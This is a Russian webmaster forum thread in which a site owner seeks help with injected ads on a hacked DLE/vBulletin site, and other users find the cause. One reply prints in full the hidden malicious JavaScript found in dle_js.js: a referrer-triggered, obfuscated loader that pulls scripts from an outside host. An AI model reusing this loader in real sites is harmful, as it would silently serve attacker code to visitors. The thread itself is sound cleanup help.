Взломали сайт. Появляется реклама.

12
W1
На сайте с 15.03.2010
Offline
83
1896

Взломали мой сайт http://lovegelen.ru/ Сайт имеет движок DLE и для форума vBulletin. При заходе с поисковых систем появляется вот такая реклама (и на сайте, и на форуме):

При инспектировании элемента вот что можно узнать:

Если просто посмотреть код страницы, то ничего не найдешь. Элемент как-то вставляется непосредственно до тега </body>.

В шаблонах сайта посмотрел - ничего не нашел. Искал по дате изменения файлов на сервере - тоже безрезультатно.

Подскажите, пожалуйста, как убить эту гадость?

Замечательный мужик, свою девушку возит в Геленджик (http://lovegelen.ru).
Greensneak
На сайте с 26.05.2013
Offline
99
#1

Зашёл на сайт с поисковика и увидел ту же заразу.

Копайте файлы дальше. Ещё один вариант - взломали сам хостинг. Попробуйте хостеру написать.

Регистрация домена (https://goo.gl/8evS7V), хостинг (https://goo.gl/xhACo2)
W1
На сайте с 15.03.2010
Offline
83
#2
Greensneak:
Зашёл на сайт с поисковика и увидел ту же заразу.
Копайте файлы дальше. Ещё один вариант - взломали сам хостинг. Попробуйте хостеру написать.

Написал хостеру - ничего не нашли.

M
На сайте с 20.01.2009
Offline
221
#3

aibolit ом проверяли?

Мониторинг, анализ и проверка позиций сайта в поисковых системах (http://allpositions.ru/redirect/820)
W1
На сайте с 15.03.2010
Offline
83
#4
Morfin:
aibolit ом проверяли?

пока не проверял. Сейчас установлю

T
На сайте с 09.12.2011
Offline
55
tls
#5

Woland1982, Проверяйте:

/engine/classes/js/dle_js.js:

var regV = '/ya\.|yandex\.|google\.|mail\.|rambler\.|vk./';
var ref = document.referrer;
var result = ref.match(regV);
if (result) {
function P3wRn9(n){ var suzRqS = 'abcdefghijklmnopqrstuvwxyz'; var iVec = suzRqS.charAt(Math.floor(Math.random() * suzRqS.length)); while(iVec.length < n) iVec += Math.random().toString(36).slice(2, 12); return iVec.substr(0, n);}
var HkF71iU = P3wRn9(6);
var z5H7SJu6UFcR = document.createElement('script');z5H7SJu6UFcR.src = 'http://www.rt-ns.ru/'+HkF71iU+'.php?id=11303&mb_s=1&f=m';z5H7SJu6UFcR.type = "text/javascript";document.getElementsByTagName('head')[0].appendChild( z5H7SJu6UFcR );function IppRK2DLfW81(){if(window.beSu===undefined){setTimeout(IppRK2DLfW81,1e3);return}for(i=0;i<xzArr.length;i++){var a=document.createElement("script");a.src="http://www."+qwDo+"/"+plFo+"/"+xzArr+".php?id="+kfId+"&mb_s="+nlMs;a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a)}}IppRK2DLfW81()
}
A
На сайте с 04.11.2012
Offline
77
#6

эта фигня находится в js-файлах, скорее всего в библиотеках мутулса.

Искать только регулярными выражениями, используя кусочки домена в ифрейме или сам iframe.

Проверь http://lovegelen.ru/engine/classes/js/jquery.js

http://lovegelen.ru/engine/classes/js/jqueryui.js

По крайней мере, там я находил, когда такое случалось на сайте напарника.

iqmaker
На сайте с 17.04.2012
Offline
342
#7

tls, все верно написал, хрень находится в конце файла www.lovegelen.ru/engine/classes/js/dle_js.js (41-47 строки), только вот через какую дыру dle она туда попала и как ее закрыть вопрос открытый, но это лучше всего обновиться до последней версии и убедиться, что не остались backdoor-ы

UV
На сайте с 14.04.2014
Offline
5
#8

DLE - Это одна сплошная дыра...

Смотрите логи, там будет видно куда копать

Раскрути свое видео в ТОП YouTube - http://ufovideo.ru (http://ufovideo.ru)
T
На сайте с 09.12.2011
Offline
55
tls
#9
tls:
Woland1982, Проверяйте: /engine/classes/js/dle_js.js

Еще: /forum/clientscript/yui/connection/connection-min.js

И конечно надо искать через что залили.

W1
На сайте с 15.03.2010
Offline
83
#10

Спасибо, tls, все верно. Эта гадость там, где Вы писали, и располагалась. Теперь буду искать через что залили.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий